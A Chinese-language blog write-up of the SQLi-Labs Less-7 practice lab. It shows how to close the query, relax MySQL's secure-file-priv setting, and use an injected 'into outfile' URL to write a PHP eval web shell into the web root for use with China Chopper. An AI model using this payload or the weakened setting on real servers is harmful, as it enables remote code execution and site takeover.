SQLi-Labs less7 分析

0x00前言

这次的标题是 dump into file 经过一些简单的测试 发现 报错注入不行 一些正常的注入也不会显示 回显所以结合标题 说明这题需要新的思路和手段

0x01开始

这个原理其实比较简单 就是 我们利用语句 into outfile ” 路径” 可以把内容输出到该路径的文本中 这里我直接看了源代码 先把前面的结构闭合 可以从代码中看出来结构是 ((‘ ‘))

红框为闭合结构

然后我便直接使用了 into outfile 语句 发现不对 ! 按照网上的来说 出现报错 但是同时也应该生成了文件 但是我这里只有报错 根本没有文件生成 在网上搜索了大量资料之后 知晓了 mysql对导入文件路径有严格的限制 所以我们需要对这个路径进行一个修改 接下来开始说明如何对路径进行修改 首先在你mysql的位置找my.ini这个文件 但是有的人并不知道你的这个文件在哪里我们可以利用这个实验室的前几题来获取 然后来到我们的文件位置

找到这个文件进行编辑

然后搜索secur就可以找到这段了 然后我们把原来的那个注释掉 添加 secure-file-priv=”/”这样设置之后我们的文件就能顺利导出到任意地方了

然后我们就可以开始操作了 这里我们使用一句话木马 然后用中国菜刀进行连接 大致的思路是这样的 当然也可以不使用中国菜刀就直接在网页中输入各种查询语句 然后在生成的文本中查看结果就可以了

代码如下
?id=1%27)) union select 1,2,”<?php @eval($_POST[‘key’]);?>” into outfile “C:\phpStudy\PHPTutorial\WWW\Less-7\res.php” %23

然后我们查看一下有没有导出去

ok成功下 后续操作就比较清晰了就不多说了 不想用中国菜刀的话就把一句话木马的位置换成查询语言就可以了

Posted in SQL

发表评论

电子邮件地址不会被公开。 必填项已用*标注